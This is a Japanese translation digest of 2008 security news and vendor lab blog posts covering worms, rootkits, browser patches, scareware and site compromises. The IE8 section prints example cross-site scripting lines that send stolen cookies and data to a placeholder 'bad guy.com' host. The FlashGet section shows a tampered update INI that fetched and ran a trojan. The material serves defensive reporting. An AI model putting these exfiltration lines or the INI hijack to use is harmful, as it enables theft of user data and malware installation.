 Windowsユーザは全てのセキュリティアップデートをインストールすることを確実にすべきである。そして、好ましくはXP SP2でIE7、もしくはVistaにアップグレードすべきある。リアルタイムでアンチマルウェアを稼働しておくことはまた助けになる。それはポルノを閲覧するために新しいコーデックをインストールする必要があると考えることが、全く馬鹿げたことだと人々に分からせなければならない。

April Foolではない
Kaspersky : Lab Weblog (2008/03/31)

 ウィルスの製作者は彼らの悪意あるコードを拡散することができる機会があれば何でも利用することは周知のことである。一つのポピュラーなアプローチは祝祭日や他のカレンダ上の良く知られている日(適当な例としては、今年のバレンタインデーのスパムである)に攻撃することである。
 この祝祭日が国際的な日であれば、とりわけ効果的である。結果として、潜在的犠牲者のプールが増加となる。
 昨晩(エイプリルフールの前夜)、我々は悪名高いZhelatinワームの新たな変種の波を確認することを開始した。その時、我々のメール検出器はこのようなメッセージをピックアップすることを開始した。アンチウィルス会社は何処もこのワームの最新バージョンを検出しなかった
 最新のアタックは通常のアプローチを取っていた。

    1/ BOTマシンを準備する
    2/ マスメールスパムをサイトのリンクに含ませる
    3/ 悪意あるコードは、このサイトを閲覧したとき、自動的に犠牲者のマシンにダウンロードされる。

 そのようなサイトの最新の事例の一つを以下に示す。

 ユーザがそのページを閲覧したとき、何らかの理由で悪意あるコードが自動的にダウンロードされない場合は、ユーザが画像かハイパーリンクのいずれかをクリックしたなら、手動的にダウンロードされるだろう。この悪意あるファイルの名前の変化:その最新の例の幾つかは、funny.exe、foolsday.exe、kickme.exeである。ファイルのサイズは悪意あるプログラムの変種に応じてまた変化するが、通常は137KBくらいである。我々はこのワームをEmail-Worm.Win32.Zhelatinとして検出する。
 悪意ある奴等はBOTマシンを完全に制御するだけでなく、彼らはまた、本質的にアンチウィルス世界が実行しようとしていることを見つめている。悪意あるプログラムの最新の変種が一旦検出され始めると、新たな変種がそのサイト上に置かれる。そして、彼らが我々を監視している間(もちろん我々も彼らを監視しているのだが)、そのようなサイトでの活動を追跡している。
 我々の通常通りの警告で締めくくる:
 使用しているアンチウィルスのデータベースのアップデートを確実に実行しなさい。そして、4月1日は楽しい悪戯の日であるが、セキュリティについても忘れてはならない。

MBRに(黒い)光を投じる
F-Secure Weblog : News from the Lab (2008/03/31)

 少し前に、我々はMBRルートキットについてブログした。それは全てのセキュリティベンダの注意を惹いた。F-Secure BlackLightスタンドアロン ルートキット スキャナの最新バージョンは今やMBRルートキット感染を検出することを、あなた方に報告できることをうれしく思う。

 BlackLightは2005年の初頭にリリースされて以来ずっと試練に耐えた。検出を回避することを可能にした新たなルートキット テクニックは非常に稀な事例であった。このMBRルートキットは、我々が数年に渡って見てきた他のルートキットと全く異なっていた。そこで、我々はMBRルートキットを首尾よく検出するために、BlackLightに全っく新しいテクノロジを加えなければならなかった。
 スタンドアロンBlackLightは、ここからダウンロードできる。

ALWIL、Avast 4.8をリリース
heiseSecurity : News (2008/03/31)

 Avastウィルススキャナのバージョン4.7は、システム上でローカルユーザの権限を昇格させることを可能にするセキュリティホールを含んでいる。新しいバージョンの4.8は、このフローを修正しており、このセキュリティソフトウェアにアンチルートキットとアンチスパム機能を追加している。
 この脆弱性はローカルユーザがシステム権限レベルでシステムにアクセスすることを可能にし、aavmker4.sysドライバ中のフローによって発生させられる。IOCTL入出力リクエストを処理しているとき、このドライバはユーザ入力を十分にチェックしない。これは特別に細工されたリクエストを使用して任意のメモリ領域を上書きすることで脆弱性を攻撃し功績を上げることを可能にする。Version 4.7.1098.0と可能性のあるこのドライバの以前のバージョンが影響を受ける。とセキュリティ アドバイザリでTobias Kleinは報告している。Avastのバージョン4.8は先週末にリリースされ、この問題は修正されている。他の大きな改善はルートキットとスパイウェアの防御である。開発者はまた、ベンダの更新履歴中にリストされているあまり深刻でない幾つかのフローを修正している。
 最新のAvastのバージョンはホームユーザ用は無料である。そしてベンダのWebページからダウンロードできる。aavmker4.sysカーネルドライバの修正は、自動アップデートとしても配信されている。

Mozilla、Firefox中の10個のセキュリティホールにパッチ
ChannelRegister : Security (2008/03/31)

 Mozillaは今週仕方なくFirefoxの最新版をリリースし、その最新バージョンに10個のフロー(深刻な脆弱性は5個)にパッチを充てた。
 Mozillaは、Firefox愛好家がバージョン2.0.0.13にアップグレードすることを強く推奨している。これは、最新のアップデート中に存在する多くのセキュリティ上の問題の修正が行われているためである。
 ライバルのIEがもはやパッチしている深刻なフローは、FirefoxやFirefoxのJavaScriptエンジンをクラッシュさせ、そして、任意のコードの実行を発生させる番の脆弱性を含んでいる。
 このアップデート(Windows、Mac、Linuxベースのマシンに適用される)は、Mozillaによって自動的に押し出された。
 現在パッチされている他の脆弱性はSSLクライアント認証でのプライバシー問題、HTTPリファラ スプーフィングバグとLiveConnect経由であらゆるローカルポートに接続するJavaソケットの修正を含んでいる。
 しかしながら、Mozillaは、このフローの内の5つを共有するにも関わらず、彼らのE-MailクライアントのThunderbirdの最新バージョン中に存在する修正をアップデートしていない。MozillaのDavid Ascherは先週の彼のブログで、パッチが「数週間」利用可能にならないだろうと発言した。
 差し当たり、Mozillaは以下をアドバイスしている。

 ThunderbirdはFirefoxとブラウザエンジンを共有している。そして、JavaScriptがメール中で利用可能であれば脆弱性となるだろう。
 「これは既定の設定ではない。我々はユーザがメール中でJavaScriptを起動することを強く思い止まらせたい。」

Windows版Safariに二つの脆弱性
heiseSecurity : News (2008/03/25)

 アルゼンチンのハッカーJuan Pablo Lopez YacubianはAppleのSafariブラウザのバージョン3.1(先週リリースされたバージョン)に二つのセキュリティ脆弱性を発見した。この脆弱性は、ページコンテンツで欺いたり、悪意あるコードの注入を可能にするのでアタッカーによって脆弱性を突かれることになる。
 Yacubianは、Windows版Safariのバージョン3.1(build 525.13)中の脆弱性を例証する二つのデモWebページをGeocities上にポストしている。Geocitiesは、それ自身のHTMLコードをWebページと統合するので、このページはデモが働く前にGeocitiesのコードを取り除くために少し編集されなければならない。テストで、デモの一つはGoogleアルゼンチンのWebサイトからページに偽のコンテントを挿入するためのJavaScriptを使用していた。そして、二つ目のデモページ上の非常に長いファイル名のZIPファイルは、Safariをクラッシュさせデスクトップから消滅させた。我々はこのデモページを使用してMac OS X下でこのバグを再現することはできなかった。
 この脆弱性を修正するためのアップデートは未だ利用可能ではない。アップデートがリリースされるまで、特にSafariのWindows版のユーザは、電子メール中のリンクに、もしくは個人証明のエントリ(例えばオンラインバンキング ログインの詳細)を要求するサイトへのWebサイト上のリンクに従うことは回避すべきである。

新たな凶悪なアンチスパイウェアソフト
Sunbelt Software : blog (2008/03/25)

 まさに、歯を見せてニッコリと笑い忍び笑いを漏らしている。あなたから金銭を巻き上げるためにデザインされた、新たな凶悪なセキュリティソフトが、ここにある。

三月:

    unigray(dot)com
    spymaxx(dot)com
    spywatche(dot)com
    pcprivacytool.com
    thelastdefender(dot)com
    thespybot(dot)com
    spywareisolator(dot)com
    pc-cleaner(dot)com
    pc-antispyware(dot)com
    MalwareWar(dot)com
    DataHealer(dot)com

 これらは全てCounterSpyのトライアルバージョン(フリー)で削除できる。

Googleを装う新たなスカムが発生していた
Sunbelt Software : blog (2008/03/21)

 他のトロイの木馬が実行している典型的なホストリダイレクトのニュースではないのだが、我々はGoogleの名前の使い方に少し興味を抱いた。LoadsccギャングのTrojan.Delfの新たな変種は、あなたのホストファイルを偽のGoogleページにリダイレクトするように変更する。偽のGoogleページは、偽のアンチスパイウェアプログラムであるSpywareIsolatorを推奨する。

    O1 - Hosts: 124(dot)217(dot)251(dot)147 google.dk
    O1 - Hosts: 124(dot)217(dot)251(dot)147 google.se
    O1 - Hosts: 124(dot)217(dot)251(dot)147 google.co.nz
など。

 誰かが上述の示唆(【訳注】上の画像に表示されているメッセージの指示)にしたがったならば、その結果は以下になる。

AdobeのFlash Basic、Professional、CS3にセキュリティホール
heiseSecurity : News (2008/03/20)

 Adobeは、悪意あるコードが巧妙な”.fla”ファイルを使用して侵入できるセキュリティホールが、Flash Basic、Professional、Creative Suite 3 Professionalに存在することを確認した。”.fla”ファイルはFlashアニメーション用ソーステキストを含んでいる。
 このセキュリティホールを発見したFortinetだけでなくAdobe自身もまた技術的な詳細をリリースしていない。しかしながら、cocoruderというハンドル名のハッカーは、”.fla”ファイル中の幾つかのアドレスを変更すると、このAdobeのソフトウェアは行き先を間違えて送信し、呼び出される外部コードを利用可能にすることをFull DisclosureメーリングリストへのE-Mailで説明している。
 AdobeはFlash Basic、Professional、CS3 Professionalにセキュリティホールを確認した。そして、次のバージョンで修正することをアナウンスしている。しかしながら、cocoruderによると、この脆弱性はMacromedia Flash MX 2004にも影響を与える。Flash BasicとProfessionalのMacバージョンには明らかな影響受けやすさは存在しない。ネットから”.fla”ファイルをダウンロードするユーザは、信頼されるソースからファイルを開くことだけを確実にすべきである。

Spybot Search&DestroyがUpdate、Rootkitの検出をサポート
heiseSecurity : News (2008/03/20)

 Spybot Search&Destroyアンチスパイウェア ソフトウェア(非商用利用はフリー)の作成者は、ルートキットを検出するプラグインを含むアップデートをリリースした。また、ユーザのシステム上でステルスされたプログラムを嗅ぎ出すためのスタンドアローンツールをダウンロードすることができる。

 このRootAlyzerツールは未だ開発中であるが、Spybot Search&Destroyのフォーラムからダウンロードできる。このツールは、ルートキットによる感染を示唆するあらゆる食い違いを同定するために様々なシステムとWin32API関数に対するレジストリ、ファイルシステム、起動プロセスをチェックする(これはクロスリファレンスとして知られている)。RootAlyzerは個人利用に関してはフリーである。

以下もまた参照
・ We've got great, new plugins for Spybot and a complete new tool - the RootAlyzer!, announcement from the Spybot Search&Destroy development team
・ Forum thread with download for RootAlyzer 0.1.1.13

貧しい国々のためのハンドパワーラップトップがデザイン賞を受賞
Guardian Unlimited : Technology (2008/03/19)

 セキュリティ情報ではありませんが、面白いニュースなので・・・

 手回し式パワーで充電し、とりわけ開発途上国で使用されるようにデザインされたラップトップコンピュータがBrit Insuarnce Awardで、デザイン賞を受賞した。
 Yves Behar(One Laptop Per Childのデザイナ)は昨晩、ロンドン デザイン ミュージアムで発案者のJames Dysonにより表彰された。最終選考に残った他のデザインには、Hussein Chalayanのautumn/winter 2007コレクションとPenguin classics Deluxe Editionが含まれる。

【訳注】One Laptop Per Child : 世界中の子供に向けて教育手段を提供するため、100ドル・ラップトップを開発・研究することを目的とした非営利法人

 Beharは、この賞はDeyan Sudjic(デザインミュージアムのディレクタ)によって説明された進行中のプロジェクトに「癒し世界での善行」として「花を添えた」と語っている。このコンピュータは標準的ラップトップの10%以下のパワーで使用でき、太陽光下で容易に可読できるスクリーンを持っている。WiFiアンテナを持っているのでネットワークも可能である。
 このラップトップは非営利基本構想の一部であり、マサチュセッツ工科大学によって開発された。「このアイデアは、全く異なった何かを作成することであった」とBeharは発言している。「我々は子供の必要性と熱望に焦点を当てることを望んだ。そして、同時にコンピュータデザインを変更し、それを低価格に維持した」このコンピュータの製造コストは$180 (£90、約18000円)である。
 既に600,000台が発展途上国に配布され、ペルー、ウルガイ、メキシコ、ナイジェリア、エチオピア、モンゴルや他の国々からの注文がある。
 Beharはこのテクノロジがパテント化されることは無いと発言した。西側の市場で類似の低エネルギーコンピュータの導入を妨げる物は何もない。賞の審査員は「デザイン自体を超えた功績」としてOne Laptop Per Childを称賛した。このコンピュータと100の一時選考を通過したデザインは、4月27日までデザインミュージアムで見ることができる。

3月の月例パッチでExcelが計算を失敗する
heiseSecurity : News (2008/03/17)

 Microsoftの最新のパッチデイ(【訳注】米国時間で毎月第二火曜日)で、MicrosoftはセキュリティブレチンMS08-014で説明したアップデートをリリースした。このアップデートはExcelで一部の計算を間違わせる問題が発生している。Microsoftは解決策をリリースした(【訳注】こちら参照)。
 Microsoftナレッジベースの記事によれば、バグはVisual Basic for Applications(【訳注】VBAと略される)でプログラムされた関数を使用してリアルタイム データソースにアクセスするワークシート中の結果に誤った計算を発生させる。一時的解決策として、Microsoftはセルのグループよりむしろ個別のセルに、そのような関数を適用することを推奨している。この解決策は問題の発生を防ぐべきである。Microsoftのセキュリティブログ中のエントリによれば、開発者はこのバグの修正用パッチをテスト中である。しかし、このアップデートのアップデートが何時リリースされるか不明である。

TrojanGet世界中のユーザに感染
Kaspersky : Lab Weblog (2008/03/14)

 ここ数日に渡り、Kasperskyアンチウィルスのユーザの何人かが、KasperskyアンチウィルスがFlashGetフォルダ中にトロイの木馬を検出することを通報してきた。FlashGetは世界中の多くの国で人気のあるダウンロードマネージャである。

 我々は世界中のユーザからのレポートを確認した。主たる感染の徴候は、inapp4.exe, inapp5.exe, inapp6.exeファイルがシステム中に現れた時に存在し、Kasperskyアンチウィルスは、それぞれTrojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezo, Trojan-Downloader.Win32.Agent.khtとして検出する。
 我々の注意を惹いたことは、上述のトロイの木馬が単独でマシンに侵入することができないにもかかわらず、感染マシン上に他のトロイが存在しなかったことである。さらに、犠牲者の何人かはマシンにパッチを充てていた(OS、ブラウザ共に)。マルウェアはどのように侵入したのか? 何を実行したのか?
 このトロイの存在位置は充分過ぎるほど分かっている。そこで、我々はFlashGetフォルダを注意深く調査した。それは、このトロイを追加して消えていた。FGUpdate3.iniファイルもまた、新たに作成/改竄されたデータを持っていた。以下の青色で強調した変更を参照。

    [Add]
    fgres1.ini=1.0.0.1035
    FlashGet_LOGO.gif=1.0.0.1020
    inapp4.exe=1.0.0.1031
    [AddEx]
    [fgres1.ini]
    url=http://dl.flashget.com/flashget/fgres1.cab
    flag=16
    path=%product%
    [FlashGet_LOGO.gif]
    url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
    flag=16
    path=%product%
    [inapp4.exe]
    url=http://dl.flashget.com/flashget/appA.cab
    flag=2
    path=%product%

 このinapp4.exeへのリンクは大変興味深い。これはトロイを存在させようとして、FlashGetのWebサイトに誘導する。inapp4.exeは正当なWebサイトからappA.cabとしてダウンロードされる。
 FlashGetのWebサイトにはこの出来事に関するいかなる情報も存在しないが、ユーザフォーラムには感染したユーザからの多数のポストが含まれている。そして、FlashGetチームからの応答は存在しない。更なる研究は最初の感染が2月29日発生し、記述している時点で我々に通報されていた最新の感染は3月9日であったことが露になった。
 10日間、少なくとも10日間、正当なプログラムはTrojan-downloaderとして稼働しつづけ、疑うことを知らないユーザのマシンにトロイの木馬をインストールし稼働させた。そして、このトロイの木馬はベンダのWebサイトをホストした。
 記述している時点で、このトロイの木馬はFlashGetのWebサイトから削除され、FGUpdate3.iniファイルは感染前の状態に修復された。
 我々がそれを確認したとき、FlashGetをTrojan-downloaderに変えることのできる二つの方法が存在する。第一は、とても明らかなことである。誰かがベンダのWebサイトをハックし、オリジナルの.iniファイルを、改竄されたサーバにアップロードして、あるトロイの木馬を指摘する悪意あるバージョンに置き換えた。
 なぜ、このハッカーはトロイの木馬をアップロードするために、他のサイトを使用しなかったのか? 定かではないが、.iniファイル中のFlashGetのWebサイトを指摘するリンクが潔白であるかのように見えることであることが疑われる。我々は好奇心をそそられ、このセオリーをテストするために、別のWebサイトから別のファイルをダウンロードすることを決定した。
 これは可能か? 絶対的にYes。
 あなたが実行に必要なことは、FGUpdate3.iniファイル中の何処かにリンクを挿入することである。毎回FlashGetを起動する度に、このリンクを指摘する如何なるファイルも、あなたのマシンに自動的にダウンロードされ起動される。これは、自動的に悪意ある.ini中のデータを使用するので、FlashGetのインターフェイスで”アップデート”をクリックしなくても発生する。
 FlashGet 1.9.xxの全バージョンはこの脆弱性の影響を受ける。
 もはやFlashGetのWebサイトにマルウェアは存在しないが、この脆弱性は存在する。マルウェアの製作者はFGUpdate3.iniのローカルコピーを変更できる多くのトロイの木馬を書くことができ、マルウェアの製作者によって選択されたWebサイトにリンクするTrojan downloaderを、それに挿入できる。使用されるかもしれないところの我々が確信する二つ目の方法がこれである。
 これは危険か? そう、大多数のユーザは信頼されるプログラムのリストにFlashGetを含ませている(即ち、あらゆるインターネット アクティビティとあらゆるWebサイトへのアクセスを許可するので)。そこで、この答えは再びYesである。

 今まで、この中国のベンダは公式声明をしていない。一方、我々はこの違反がどのようにして発生したのか明確には知らない。そして、これが再び発生しないと言う保証はない。私は責任の追求はしないが、あなた方自身が推論することは自由である。

トレンドマイクロWebサイトが感染させられた
heiseSecurity : News (2008/03/14)

TrendMicroのブログは3月11日に、スウェーデンのロックバンド”The Hives”のWebサイトが、JavaScriptリンク経由でドロッパー トローヤンをインストールする悪意あるiframeで汚染されていたことをレポートした。次の日、TrendMicroは自分自身が類似の攻撃で犠牲者になっていることを発見した。
 TrendMicroサイトは明らかに先週の日曜日に感染させられていたが、この問題は昨日になってTrendMicroの日本語サイトにアナウンスされるまで公開されなかった。このベンダは英語版でのいかなる詳細もリリースしていないが、Sophosブログの中間分析は、英語版ページもまた感染させられたことを示唆している。この感染させられたページは、水曜日に停止された。
 Sophosによれば、アタッカーはTrendMicroのマルウェア分析ページ中にiframeを注入した。Trendのスポークスマンは、およそ32ページ(その大部分はマルウェアのエンサイクロペディア)が感染させられていたとして報告している。このiframeは、ユーザを感染させるために中国を本拠とするサーバから、トロイとバックドアの付いたJavaScriptを使用していた。しかし、攻撃ベクトルの特定はまだ明らかでない。20000以上のWebサイトが巨大なスケールの攻撃の影響を受けて犠牲者になっていることから、TrendMicroが特に狙われたわけではなく、その侵入はMicrosoftのActiveサーバ ページ技術のバグ(この技術は明らかにTrendMicroのサーバで使用されている)経由であるかもしれないという噂がある。

【訳注】本件に関するトレンドマイクロの日本語情報サイトは以下です。
弊社ウイルス情報ページの改ざんについて

Microsoft OneCareがSiteAdvisorに不正なタグ付け
McAfee Avert Labs : Blog (2008/03/06)

 MicrosoftのOneCareチームは、2008年1月31日にアップデートをリリースした。このアップデートの結果、SiteAdvisorユーザは、SiteAdvisorがOneCareを妨害するとして、削除を推奨するMicrosoftの警告メッセージを受け取ることになった。

 SiteAdvisorはいかなる方法でもOneCareを妨害しない。我々はこの件に関しMicrosoftと接触した。そして、彼らはこの問題を解決することを開始した。
 2月21日時点で、OneCareの新しいインストレーションは、SiteAdvisorに対するメッセージを発生させない。しかし、Microsoftが2月21日以前に作成されたOneCareのインストレーションは修正されるだろうと発言しているので、OneCareの既存ユーザは、春になるまで時々このメッセージを受けとり続けるだろう。
 一般的ルールとして、この問題を解決するために、Microsoftは同時に起動するセキュリティ アプリケーションは一つだけにすることを推奨している。これは、潜在的パフォーマンスと「PCの安定性」の問題のためである。我々はMicrosoftにSiteAdvisorの機能がOneCareに全く関連していないことを説明した。
 安心なこととして、SiteAdvisorやOneCareを無効化する必要はない。この二つの製造物は申し分なく共存できる(ポップアップを除けば)。
 OneCareはアプリケーションのホワイトリストを許可しないため、影響を受ける消費者は、OneCareの全てのインストレーションがパッチを充てられるまで、幾つかのオプションが制限される。この間、辛抱していただくことになる。

InternetExplorer 8 ベータ 安全性と懸念
WEBSENCE Security Labs : Threat Blog (2008/03/08)

 Microsoftは最近、Internet Explorer 8 ベータを公開した。開発ツールと他の機能は多くの興味で受け取られている。このリリースはまた、新しいセキュリティ機能と幾許かの注意に関する懸念を含んでいる。
 新たなセキュリティ機能の一つはドメイン ハイライトである。
ドメイン強調のスクリーンショット

 フィッシィングサイトはスクリーンショットに示したように名前にテクニックを使用する。これはしばしばユーザを混乱させて、彼らが訪問することを試みたドメイン名がURL内部に存在するため、正当なWebサイトに到達したと信じさせることになる。新たな強調表示テクニックは、ユーザがアップグレードし、この新しい防御に気付いたなら、そのような企てを挫折させる助けになるだろう。FirefoxユーザはLocation^2プラグインをインストールすることで同様の機能を実装できる。

クロスドメイン リクエスト

【訳注】クロスドメイン :
     異なるWebサイトに対して開かれた複数のWebブラウザのウインドウが互いにデータにアクセスできるように,また同じWebサイトに対して開かれた複数のブラウザのウインドウが互いに対話できるようにする技術。

 他のサイトへの要求を作成するために、同一生成元ポリシー制限が適用されたとき、典型的にはあなたに代わってリクエストを作成するためにプロキシを必要とする。このような制限は、悪意あるWebサイトのような外部エントリ付きの非認証コミュニケーションを妨げる目的で作成される。典型的な、そのようなリクエストの流れを以下に示す。

Internet Explorer 8 は、新たなXDRオブジェクト付きのクロスドメイン要求を作成するための能力を追加することによって、同一生成元ポリシーの境界を破壊する。このタイプのコミュニケーションに関する制限をここに示す。

 他の幾つかの興味ある制限:
    - 各サイトのプロトコルはマッチしなければならない(https:// と http:// 間でのコミュニケーションはできない。逆も同様)。
    - リクエストされたページは、引数 1 と共にヘッダをXDomainRequestAllowedに戻さなければならない。
追加機能の詳細と事例はここに見出すことができる

セキュリティ上の懸念

Internet Explorer 8はクロスドメインリクエストを許可するため、悪意ある攻撃者は大変効果的にWebサイトにインジェクションホール コンテンツを使用できる。例によって、あるサイトがXSS(クロスサイト スクリプト)に対し攻撃を受け易い時、アタッカーはユーザ情報を盗むためのコンテンツを挿入し、それを以下に送り返す。

    <imgsrc="http://bad guy.com/steal.php?cookie=" + cookie /><img>

 この<img>タグは、外部との対話に許可されている数少ないもののうちの一つであるため使用されている。新たなXDRオブジェクトで、アタッカーは悪意あるウェブサーバに直接接続するスクリプトコードを簡単に挿入できる。

    var xdr = new XDomainRequest();
    xdr.open("POST", "http://www.bad guy.com/");
    xdr.send(stolenInfo);

 直接コミュニケーションで、挿入される悪意の総体は複雑化し機能化していくことが予見できる。悪意あるフレームワークは立ち上げられると、そのクライアントは、次に取る行動を決定するために恒常的に悪意あるサーバに接続することになる。ユーザー情報を盗むことは、このような新しい未来技術で成し遂げられることができることのまさにスタートである。

結言

 Microsoft Internet Explorer 8中のXDRオブジェクト経由での直接外部コミュニケーションのコンセプトは、何ら新しいものはない。類似のコミュニケーションは、別の手段(imgタグ、src属性を含むスクリプト、iframe、フラッシュファイル等)で達成されている。IE8の外部コミュニケーションポリシーは、たいしてユニークなものではなく、Flashの物と生き写しである。両方とも、要求したホスト上のポリシー情報を検索する(それぞれ、XDomainRequestAllowed ヘッダ と crossdomain.xml)。直接コミュニケーションの利益は、製品開発と対話性に関して大変大きいので、Firefoxのような他のブラウザもまた、それらの製造物中にクロスドメイン リクエスト能力を実装している。セキュリティは常に機能と争い、明らかな解決無に交換取引に導かれる。

セキュリティ研究者Joren McReynolds:
我々は常にあなたの意見や示唆を聞くことに興味を持っている
我々へのE-Mail : blog_feedback |at| websense.com

Adwareパッケージが初めてマルウェアのチャートのトップに
Channel Register : Security (2008/03/06)

 Virtumonde-genアドウェアパッケージが、この2月のKasperskyから提供されるオンラインスキャンツールの使用結果において、他のマルウエアの負担より大きなものであることが明かになった。
 ロシアのセキュリティ企業Kasperskyのレポートによると、このパッケージの拡散はトロイ ダウンローダ(総合的脅威の風景を支配することを継続するソフトウェアの種類)の様々な負担によってサポートされている。2008年02月のKasperskyオンラインスキャナ チャートにおける新しいエントリの半分(11)以上がトロイ(ダイアラ、ドロッパー、ダウンローダ)によって占有されていた。トロイはしばしば、改竄されたPC上でマルウェア(Virtumondeパッケージを削除することを困難にすることで有名なような)の他の形式を許可するバックドアとして使用される。
 「検出されていないトロイ ダウンローダは、サイバー犯罪者が既に改竄されたマシン上でマルウェアをアップデートすることを可能にし、マルウェアの『品質保持期限』を延長する」とDavid Emm(Kaspersky Labs UKのシニア技術コンサルタント)は発言している。
 Kasperskyの一月のチャートのトップであったDialer-YZトロイは、二月には三位に後退した。マルウェアパッケージの種類の多さは、KasperskyのTOP20中に表示される程の負担をかけていない感染が86%を占める事実によっても理解できる。二月、Kasperskyの統計によれば、イギリスは感染させるメッセージの発生源の五位にランクされた。アメリカはこのリストの首位(13.3%)である。続いて、韓国(7.88%)、インド(6.05%)、中国(5.75%)である。

 2008年02月、Kaspersky オンラインスキャナ Top 10

    Virtumonde_gen adware (2.86 per cent)
    Bagle-OF email worm (1.32)
    Dialer-YZ Trojan (1.27)
    Small-ieg Trojan (1.21)
    RAS-A password stealer (1.01)
    Brontok-Q email email worm (0.75)
    Zlob-fjb Trojan downloader (0.72)
    Ardamax-n Trojan (0.53)
    Rays email worm (0.46)
    Agent.dnu Trojan dropper (0.44)

MonaRonaDonaマルウェア
Kaspersky : Lab Weblog(2008/03/03)

 先週中、"MonaRonaDona"と呼ばれるマルウェアの通報が巨大な数の増加を見た。
 MonaRonaDonaがシステムにインストールされると、このマルウェアはユーザに警告を表示する。

 アクティブになると、ウィンドウのタイトルバーに以下にリストされる名前を持つアプリケーションは終了させられる。

    Date And Time
    Windows Task Manager
    Registry Editor
    Irfanview
    Google Talk
    Macromedia
    Adobe
    Microsoft Visual
    Windows Media Player
    Winamp
    Microsoft Office
    Microsoft Excel
    Microsoft Word
    Messenger

 IEのタイトルバーもMonaRonaDonaへの参照を含むだろう。
 マルウェアが実際にどのようにシステムに到達するのかは、現時点で完全には明かになっていない。最初に起動したとき、このプログラムが実行する唯一のことは、Windowsのブートで起動するために自分自身を登録することである。感染の徴候は即座に現れない。これは実際に感染したとき、それらが実行したことを犠牲者が特定することをより困難にするためである。これらの特徴は、このマルウェアがサイバーフーリガン(犠牲者のマシンにダメージを発生させることに興味を持っているだけの輩)によって作成されたかのように見せている。しかしながら、もう少し掘り下げてみると、全く違った話が露になった。
 たとえ、そのマシンが感染させられたことが即座に明らかでないにしても、大多数の今日のマルウェアとは対照的に、MonaRonaDonaはとても可視である。このマルウェアは、犠牲者にお気に入りの検索エンジンを使用させて、MonaRonaDonaの情報を検索させるように、明らかにデザインされたアプローチがある。
 犠牲者がこの名前を使用して検索したなら、犠牲者は以下を表示するサイトに行き着くハメになる。

 あるいは、Diggで

 それらは以下に導く。

 偶然に、私がマルウェアを受け取った時点で、アンチウィルス製品でこれを削除するものは無かった。しかし、上のスクリーンショットにリストされているアンチウィルス製品の名前は、Unigrayアンチウィルスを別にすれば、大多数のユーザに馴染み深いものである。
 わずかな研究で以下の事実が露になった。第一に、Unigray.comは未だ二週間しか存在していない。これは少し警戒感を惹き起こす。
 第二に、それは、非常に短い期間存在するだけの製造物用の膨大なアンチマルウェア データベースである。面白いことに、「大多数のレコード」の値はこの製造物中にハードコードされている。しかし、アップデートがなされたとき、このプログラムは最新のアップデートがインストールされたと常に通知(虚偽)する。もう一つの警戒。
 もう少し掘り下げると、この製造物が以下の悪意あるプログラムに関する「検出」だけを持っていることを発見した。

    Win32.CIH
    BlazeFind
    e2give
    Hancer
    Cydoor
    PowerStrip
    EliteBar
    DyFuCa
    2020Search
    Aurora
    Spy Trooper
    SpySheriff
    CoolWebSearch
    W32.Gampxia!html
    W32.Gampxia
    W32.Imaut.CN
    W32.Selex.B@mm
    Win32.ch
    MonaRonaDona

 このプログラムは、一見して上に示した悪意あるプログラムのリストからランダムに名前を選択し、完全にクリーンなシステムでほぼ200の偽の警告を発生させる。面白いことに、MonaRonaDonaに感染したシステム上で、この『アンチウィルス』はまた、クリーンなファイルをMonaRonaDonaとして検出し偽の警告を発生させる。
 正当なアンチウィルスプログラムが検出していないにもかかわらず、このような新しいプログラムがMonaRonaDonaの検出を含むことは大変奇妙と思える。このプログラムの更なる解析で、このプログラムが唯一つの削除ルーチンを持っていることを見出した。Unigrayはこのプログラムを僅か$39.90でクリーンにするが、私には最高の取引だと思えない。
 MonaRonaDonaとUnigrayアンチウィルスのコードを比較すると、大変大変多くの類似性が存在する。これは同一のグループがMonaRonaDonaとUnigrayの両方の背後に存在しているというチョッとした疑念を抱かせる。今回のケースは明らかに悪い奴等がソーシャルネットワーキングで善良を装っていることを示している。彼らは明らかに彼らが望むことをユーザに実行させるよう、ユーザを巧みに取り扱う多くの思考を装填している。
 kasperskyは、MonaRonaDonaをTrojan.Win32.Monagrey.aとして、UnigrayアンチウィルスをFraudTool.Win32.Unigray.a(ウィルスとしてではなく)として検出する。

ドイツ警察のトロイの木馬
F-Secure Weblog : News(2008/03/04)

 ドイツ憲法裁判所は先週の水曜日、ドイツ情報保安部による「サイバーモニタ(トロイの木馬)」の問題に関し判決をくだした。
 我々は過去にこの問題に関しポストしている。

 法廷が水曜日にどのように判決したのだろうか? それはあなたがヘッドラインをどのように解釈するかによる。
 NewYork Timesから

 International Herald Tribune (part of The NYT Company)から

 ウ〜〜ン。「制限付き許可」と「不利な判定を下す」・・・ いつもながら複雑な問題である。
 Deutsche Well(ドイツ情報サイトの国際版)から

 基本的に「判決は2007年1月以来、明らかにトロイの使用を許していたノルトライン・ウェストファーレンの西ドイツ州で広く定式化されていた法を無効にした」。
 しかし、判決は[生命や国有財産]が危険であるとする証拠が存在するのであれば、疑わしい者のハードドライブから秘密裡にデータを収集するための諜報機関を許可している。
 法執行当局は彼らがスパイウェアを秘密裡にアップロードする前に裁判所の許可を得なければならない。
 この法律に関して、あなたはどのように考えますか?

Vista SP1 二題
(2008/02/23)

テスト結果からの警告ーVista SP1を回避せよ。 heiseSecurity : News(2008/02/18)

 Windows Vistaの最初のサービスパックがインターネット上で既に利用可能であるが、ユーザは未だ利用すべきでないと、ドイツheiseは現在公開しているc't magazineオンライン版でアドバイスしている。Microsoftでさえ現行バージョンは、特定のプレインストールされるドライバで未だもがいていることを認めている。Microsofotは、このドライバを数週間以内に自動アップデート経由で置き換えることを望んでいる。
 Windows Vistaの部分的アップデートに関し、ユーザは昨年自動アップデートサービス経由で通常パッチを受け取った。しかしながら、大多数はオペレーティングシステムのより広範囲なアップグレード(初期に発生した大多数の問題を取り除くことが期待されていた最初のサービスパック)を待ちきれていない。
 c't magazineのテストはサービスパックのインストレーションに関する幾つかの改善点を露にした。Vistaはデータのコピーが高速であり、他の仕事もまたスピードアップされている。更に、Microsoftは、ユーザに考えることをさせずにクリックさせると批判されていたセキュリティ警告の数を減少させている。オリジナルバージョンでは起動しなかった多くのプログラムが今は稼働するが、それらの全てではない。例えば、GoLive 2(【訳注】Adobeのオーサリングソフト)は、その透過的アエロインターフェイスのスイッチを切り、そのゲーム(Fahrenheit)は結局開始できない。
